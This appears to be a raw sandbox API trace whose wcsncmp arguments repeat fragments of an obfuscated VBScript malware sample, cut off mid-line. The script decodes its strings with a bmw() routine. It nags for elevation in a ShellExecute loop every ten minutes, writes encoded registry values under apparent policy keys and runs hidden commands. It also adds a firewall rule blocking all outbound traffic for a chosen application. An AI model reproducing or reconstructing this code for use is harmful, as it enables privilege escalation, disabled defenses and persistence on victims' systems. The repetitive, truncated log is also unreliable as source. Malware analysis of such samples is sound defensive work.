bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0226.355] wcsncmp (_String1="le\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0226.355] wcsncmp (_String1="e\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.355] wcsncmp (_String1="\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 44 [0226.355] wcsncmp (_String1="\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.355] wcsncmp (_String1="Set newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite 